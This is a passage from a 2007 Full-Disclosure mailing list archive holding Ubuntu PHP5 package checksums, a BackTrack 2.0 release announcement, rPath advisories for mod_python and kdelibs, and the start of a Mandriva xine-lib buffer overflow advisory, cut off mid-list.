c5ed5eed51fc95ec532af4da020a4e88 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 2353800 28d3e0b04127ce29d43fa4665fef7649 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 133640 a1ca18f6883477cdf33aa33f46c9769b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 26614 03eb951f8f0c9924d6b69f19f86bc44d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 312594 8e583176125c8abb74a39e616977a49a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 36432 b545380f9c0c7f98713c21de8fb3ac6a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 22548 e64c2c2828de6a5c1253483464fbe0b6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 10126 aa2fb0498713652e7efcf9cfb1bf2d3e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 24818 67096998be58269ac6fe1e30254171c5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 41778 9ed68b418476f33a4d7c75aff5809272 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 30076 ee962b9f3f6eec23ce83b92525391369 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 43414 56025e7737e7ab2ab3a2307267dca00d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 9792 4e7755a0e9bb3f33610ca504643e35ef http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 15946 fc4c7aff9cd4977e3856fa560e11da99 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 29436 ce0088f4dd1610c4339fdd1e822f10fc http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 23580 92f8ea6e13b52954c7c7e408c71d41d8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 40898 defc4389b768abec1d8f47fdc2239db7 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 17244 4a6eb9d473b580a8daf4b60cc50cfd9c sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 2322386 042eabfa828a292b0f1427c35a146849 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 4530892 aa1cb2c9b23150cc61bc9b7af4ba9d3c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 2275654 762413f4e997334f83ab385e21258b45 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 133646 57a451853ef0231f5e800df5f41efcc4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 24560 1c585b2f206ec5d8860a6331f36c10fe http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 312550 70af43881f2d94d350203de12f0e8551 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 33242 ac1ceb0d2cc4cd31e3b7108fb6f35f55 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 20092 80f9f3fa79af85302b88bac31bbf54d4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 8372 01e3415882f09a8e4dba900369082199 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 22362 5d5bcb8fb36df3be1daabd6285d03136 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 38654 2d141fad87c506ac19adba644cfb1c19 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 26836 b7e25744fc17e3e17433ce47b7acf6f9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 40614 5612be92d7eb453d29d95ace7b1922ab http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 8106 296bdae0fa560357e0cba601471109f8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 14052 b1c3de4029225a19ed2c7ff418adfb8c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 25964 303e083d5f560ede8d2132c786077f6e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 20788 2cd17d476be3cda706eb3fa05c0bc313 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 38028 ce39cd1911b8cd146ff2328b168cbb25 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 15082 d441d6235abe88990dc11384da200487 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6-1ubuntu2.3.diff.gz Size/MD5: 107479 7d180d00bc62da71934cdb1e13ecf817 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6-1ubuntu2.3.dsc Size/MD5: 1766 21ed2c34115f447ec0bcad613cc45ecb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6.orig.tar.gz Size/MD5: 8187896 04d6166552289eaeff771f5ec953b065 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.6-1ubuntu2.3_all.deb Size/MD5: 305694 18df7f5881e899b6afc68acd45e282a5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6-1ubuntu2.3_all.deb Size/MD5: 1070 450e72489f77db90c8371455fac31291 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 2429170 26e877f10606e3e3dee0ad5f3bc95655 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 4722618 03b4be3c2c6313727bd819cf69451021 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 2384804 4cf63801aa4a75c9861ad3ff2f003f1a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 139898 80f4ececf9622e6a6c2923aa7f443363 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 25826 e7d183bf2c9c3f1bc430ec0d22c028d7 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 308460 47c093a7a81e3faab7b75a52260f9017 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 37194 e4978c80286a921ff62753d0171dcd75 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 22164 513f34aeb27901744e116afc21f5a2f2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 8874 037dad99aba32c172c273d64e1b2e92f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 25346 ac078728a7c3750f5f3faf87348ccf6b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 44268 5bb5d2b7ec8fe51b3b96cb82089b721e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 30272 8675e39c6796bba43e335b569a1ddf79 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 44304 e3bac51448355e4797ccf9be593d9e97 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 8354 8634aa0116340a3897725ad48e5e1550 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 15542 c81a3772e4e9e82f30b07977c754d25e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 29326 411925fdcf88c977c10257ccdee9b4d8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 22878 fbb15b6b5c4852e359e96e347de7f68c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 42690 4eca58e4dddc8116bc8df77f2f45f97e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 16474 79e46497183d1eebd6ad3b893f79a6a7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 2318230 179c500c8e7c2f87bd338d7be97a0848 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 4578968 9126f89416a242eed33c1a5bceac740b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 2304466 b8568170f90df1dc067dbf12a7ffc851 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 139900 69056528d18c8d4971a5b00903c603e0 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 24574 4259db29f6ae50ebc24f510baf869397 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 308482 58073a11cea4f900d9ecfea2d69c1f19 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 34086 084b942c6123b030565c601f422bb7a6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 20324 db6a087587dc2cae9f265ccb404a871f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 8630 5f55e30cf76abe7e9eb779ef60d021e2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 23106 3120306fae51697681de099a7285bc48 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 39494 0c3bd231f67301d82995ea83a6b7097b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 28402 074a55853f9af1aa966a6fcc2c938e3f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 41674 7742074b4cc576052307c36eb400e0e5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 8180 a8fea8b773d7e935262d9b6d10be5f35 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 14628 0034283b12136fd03bc73b2d1ef28e54 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 26432 09d9918a42cc93a7b99f962280f91319 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 21488 a7e4db77f6893d1407fa9ccb414b5ab9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 39810 a83ff00d0a28123fe0ff932da22d4a92 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 15492 31622fa630e0e16777d0345d54c33282 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 2449340 90309539e6bd9d3836bed3f2ad6d542a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 4774572 3962544cb575538a14af1172f799662c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 2402654 63be9437c15207b0d0f4309393041ebd http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 139896 49041329cf25fa6280aa33f0145f1232 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 27778 a5f425db5c6e59f4d414a1d62a2b8fca http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 308518 d6f0ad2bc3957b622957ba8e1fb704ca http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 37282 0932279eda51eb0cd3b4fa937bffc375 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 22822 36ea36d554308267ef49f4c765a755ca http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 10264 84422f0276be805ea2a6c7fc02e3b016 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 25370 735ec4ee74dde0eff2ce307669eb4f1b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 42604 a7cb9c9e3f3313a31b3bd75bfb2d451f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 30462 4e527cc5d0477be79bd8b95a4b8aa00e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 44506 3f3f1313038b7a5fbfdd1ed635e3a2e6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 9816 fe51bc64e327ab05ec923f4a501c7b46 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 16162 4f93cc92b80298270f64b94f6be9421a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 29562 53dc8d3ac6456554f1c9a320950a2abe http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 23794 b388ffeed02462f5e1ca42b49d7740aa http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 41392 92ac4b081a55951f9f1966d07ba6ec65 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 17282 bdd2005caaaef91057d33e0c966a61f2 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 2342178 a52bd8c74db2a4ccf607655c0475bbc9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 4555930 3ac4db185822c777d63397a6915af796 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 2296724 faa162d38976d97bbcfaacfcf83e98a1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 139908 c7dbd1cfaa303a6aae59e0d78244b6aa http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 25360 c3f4c24dabbc8156754eb0bd9dfacaf9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 308470 3a4df66c93e41144499b4264a4cd210b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 34100 317e15047bd594f038b567888e6ef99c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 20098 c50f44cb1546a0ab176d23863fdcfd2a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 8456 9295addd932df14f2ac0290446c38322 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 22620 c6a026463a8c8dbd8986f8b2a0cffcb7 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 39186 fbd135194b8aa1ff9e665417c34a5004 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 27312 99e5e96217a08e9992ae76e276515973 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 41220 b82658e62c0e151fe54d11786c3368ae http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 8096 9ef3dee7b074399997d2f1ddec59da72 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 14326 6485a83ca14d202c722e14248ad46625 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 25926 bc25e3db5d98b534c03c0ba99d47a54a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 21002 12d5f11dc804bc740485a57cfc310a89 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 38446 fb0c0005760518b89192ab3f60204aa2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 15068 ff61da3d4de17245d8403850f2132aaf -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070307/ca17c7f4/attachment.bin From Thierry at Zoller.lu Thu Mar 8 12:25:22 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Thu, 8 Mar 2007 13:25:22 +0100 Subject: [Full-disclosure] Ann: Backtrack 2.0 released Message-ID: <817638793.20070308132522@Zoller.lu> Dear List, On behalf of the Backtrack Team (which I am _not_ part of) I'd like to direct your attention to the immediate availability of Backtrack 2.0 and would like to personaly thank them for the immense effort put into this Project. http://www.remote-exploit.org/backtrack.html BackTrack is the most Top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes. It's evolved from the merge of the two wide spread distributions Whax and Auditor Security Collection. By joining forces and replacing these distribution the BackTrack could gain a massive popularity and was voted in 2006 as #1 at the surveil of insecure.org. Security professionals as well as new-comers are using it as their favorite toolset all over the globe. New exciting features in BackTrack 2, to mention a few: * Updated Kernel-Running 2.6.20, with several patches. * Broadcom based wireless card support * Most wireless drivers are built to support raw packet injection * Metasploit2 and Metasploit3 framework integration * Alignment to open standards and frameworks like ISSAF and OSSTMM * Redesigned menu structure to assist the novice as well as the pro * Japanese input support-reading and writing in Hiragana / Katakana / Kanji. * A lot more.. BackTrack has a long history and was based on many different linux distribution until it is now based on a Slackware linux distribution and the corresponding live-CD scripts. Every packet, kernel configuration and scripts are optimized to be used by security penetration testers. Patches and automatism have been added, applied or developed to provide a neat and ready-to-go environment. After coming into a stable development procedure during the last releases and consolidating feedbacks and addition, the team was focused to support more and newer hardware as well as provide more flexibility and modularity by restructuring the build and maintenance processes. With the current version, most applications are built as individual modules which help to speed up the maintenance releases and fixes. Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances). Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares. Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date. No other commercial or freely available analysis platform offers an equivalent level of usability with automatic configuration and focus on penetration testing. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 4813 c403 58f1 1200 7189 a000 7cf1 1200 9f89 a000 From announce-noreply at rpath.com Wed Mar 7 23:00:50 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Wed, 07 Mar 2007 18:00:50 -0500 Subject: [Full-disclosure] rPSA-2007-0051-1 mod_python Message-ID: <45ef4422.3zNTJkFJSgqx+bRb%announce-noreply@rpath.com> rPath Security Advisory: 2007-0051-1 Published: 2007-03-07 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Information Exposure Updated Versions: mod_python=/conary.rpath.com at rpl:devel//1/3.1.4-8.4-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2680 https://issues.rpath.com/browse/RPL-1105 Description: Previous versions of the mod_python package have a weakness that can expose the contents of previously-freed memory, leading to potential information exposure. From announce-noreply at rpath.com Wed Mar 7 23:01:34 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Wed, 07 Mar 2007 18:01:34 -0500 Subject: [Full-disclosure] rPSA-2007-0052-1 kdelibs Message-ID: <45ef444e.Lkl4CN6Eew9zBU3o%announce-noreply@rpath.com> rPath Security Advisory: 2007-0052-1 Published: 2007-03-07 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Weakness Updated Versions: kdelibs=/conary.rpath.com at rpl:devel//1/3.4.2-5.13-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0537 https://issues.rpath.com/browse/RPL-1117 Description: Previous versions of the kdelibs package enable a cross-site scripting (XSS) attack against the konquerer web browser by embedding certain HTML tags within a comment in a title tag. From security at mandriva.com Thu Mar 8 15:03:24 2007 From: security at mandriva.com (security at mandriva.com) Date: Thu, 08 Mar 2007 08:03:24 -0700 Subject: [Full-disclosure] [ MDKSA-2007:057 ] - Updated xine-lib packages to address buffer overflow vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:057 http://www.mandriva.com/security/ _______________________________________________________________________ Package : xine-lib Date : March 8, 2007 Affected: 2007.0, Corporate 3.0 _______________________________________________________________________ Problem Description: The DMO_VideoDecoder_Open function in dmo/DMO_VideoDecoder.c in xine-lib does not set the biSize before use in a memcpy, which allows user-assisted remote attackers to cause a buffer overflow and possibly execute arbitrary code. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 241273125b4e2014a0fa1580c7ed0413 2007.0/i586/libxine1-1.1.2-3.3mdv2007.0.i586.rpm e2855220283ec658301068cf00bb266a 2007.0/i586/libxine1-devel-1.1.2-3.3mdv2007.0.i586.rpm b98b3376e156fb87a34f30aad34e65e5 2007.0/i586/xine-aa-1.1.2-3.3mdv2007.0.i586.rpm 88d1b8d538dcff220bf528674d0bf5b0 2007.0/i586/xine-arts-1.1.2-3.3mdv2007.0.i586.rpm ce54bd05bd941b2224c549bf685c0a08 2007.0/i586/xine-dxr3-1.1.2-3.3mdv2007.0.i586.rpm 0e33ea09058a1cd82fd8720278243c14 2007.0/i586/xine-esd-1.1.2-3.3mdv2007.0.i586.rpm 0e8c92ffdc4c3c8073531a72a47da8ca 2007.0/i586/xine-flac-1.1.2-3.3mdv2007.0.i586.rpm 3d7eb8f9a5f45ddebd7ccc20cec808f0 2007.0/i586/xine-gnomevfs-1.1.2-3.3mdv2007.0.i586.rpm 5a1390613c4505b2bfcd326ff0156b0c 2007.0/i586/xine-image-1.1.2-3.3mdv2007.0.i586.rpm 79899e7608558bb490003b9cba2a978c 2007.0/i586/xine-plugins-1.1.2-3.3mdv2007.0.i586.rpm ed4c39cfe82d66caa19c023a8495c4a1 2007.0/i586/xine-sdl-1.1.2-3.3mdv2007.0.i586.rpm 9256f65fff35cd6c25fd0b19823dcc8a 2007.0/i586/xine-smb-1.1.2-3.3mdv2007.0.i586.rpm 0bf2ceba6a15a079bf2890265b8f1a55 2007.0/SRPMS/xine-lib-1.1.2-3.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: d92a6bebe5c1e915ed6dca150f32de2e 2007.0/x86_64/lib64xine1-1.1.2-3.3mdv2007.0.x86_64.rpm eb0c2f9d95f04e3d9c8ea1282c41f5dc 2007.0/x86_64/lib64xine1-devel-1.1.2-3.3mdv2007.0.x86_64.rpm cd81757a9c25e480d10932cb4d40f6e0 2007.0/x86_64/xine-aa-1.1.2-3.3mdv2007.0.x86_64.rpm acbaf60373d75281d3c3c7da24d7a1de 2007.0/x86_64/xine-arts-1.1.2-3.3mdv2007.0.x86_64.rpm 38997b2bd174345dcec41682569868c1 2007.0/x86_64/xine-dxr3-1.1.2-3.3mdv2007.0.x86_64.rpm 2425cc89f26171fc32f889ccf0b5b96c 2007.0/x86_64/xine-esd-1.1.2-3.3mdv2007.0.x86_64.rpm 5ddcb92e47e6f35de1db5482edf98a9c 2007.0/x86_64/xine-flac-1.1.2-3.3mdv2007.0.x86_64.rpm c68e811900a94bd92d65832f64bcdb8a 2007.0/x86_64/xine-gnomevfs-1.1.2-3.3mdv2007.0.x86_64.rpm f6aa73615c7c9a7238838641afc6af6a 2007.0/x86_64/xine-image-1.1.2-3.3mdv2007.0.x86_64.rpm 4437aff317d159abbd1785fbe53368e7 2007.0/x86_64/xine-plugins-1.1.2-3.3mdv2007.0.x86_64.rpm 4f062b56c298e09b0ec364c18814917f 2007.0/x86_64/xine-sdl-1.1.2-3.3mdv2007.0.x86_64.rpm fa2a314dbde0ccedf85043e10d94f3d3 2007.0/x86_64/xine-smb-1.1.2-3.3mdv2007.0.x86_64.rpm 0bf2ceba6a15a079bf2890265b8f1a55 2007.0/SRPMS/xine-lib-1.1.2-3.3mdv2007.0.src.rpm Corporate 3.0: dffe302693d57f09ad55573f20400258 corporate/3.0/i586/libxine1-1-0.rc3.6.15.C30mdk.i586.rpm 